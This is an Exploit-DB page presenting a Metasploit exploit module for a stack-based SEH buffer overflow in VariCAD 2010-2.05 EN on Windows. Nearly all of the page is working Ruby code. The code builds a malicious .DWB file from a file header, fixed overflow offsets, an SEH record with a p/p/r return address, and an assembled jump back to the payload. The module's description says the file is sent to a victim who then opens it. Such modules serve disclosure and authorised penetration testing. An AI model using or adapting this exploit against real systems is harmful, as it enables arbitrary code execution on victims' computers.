VariCAD 2010-2.05 EN - '.DWB' Local Stack Buffer Overflow (Metasploit)

EDB-ID:

16644

CVE:


EDB Verified:

Author:

Metasploit

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2010-04-05

Vulnerable App: 
##
# $Id: varicad_dwb.rb 9020 2010-04-05 20:45:21Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN.
				An attacker must send the file to victim and the victim must open the file.
			},
			'License'        => MSF_LICENSE,
			'Author' 	     =>
				[
					'n00b',    # first public exploit
					'dookie',  # metasploit first pass
					'MC',      # cleanup pass 1 & second offset
					'jduck'    # cleanup pass 2 & combined offsets
				],
			'Version'        => '$Revision: 9020 $',
			'References'     =>
				[
					[ 'OSVDB', '63067' ],
					[ 'BID', '38815' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/11789' ]
				],
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x0a\x3d",
					'StackAdjustment' => -3500,
				},
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'DisablePayloadHandler' => 'true',
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows Universal', { 'Ret' => 0x00401425 } ], #p/p/r in varicad-i386.exe
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Mar 17 2010',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'msf.dwb']),
			], self.class)
	end

	def exploit

		header = "\x34\x87\x01\x00\x00\x00\x00\x00\x25\x5c\x1f\x85"
		sploit = rand_text_alpha_upper(1000) * 50

		# Add SEH frames..
		seh = generate_seh_record(target.ret)
		offsets = [ 26252, 22856 ]
		sploit[0,payload.encoded.length] = payload.encoded
		offsets.each { |off|
			sploit[off,seh.length] = seh
			distance = seh.length + off
			jmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
			sploit[off+seh.length,jmp.length] = jmp
		}

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(header + sploit)

	end

end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services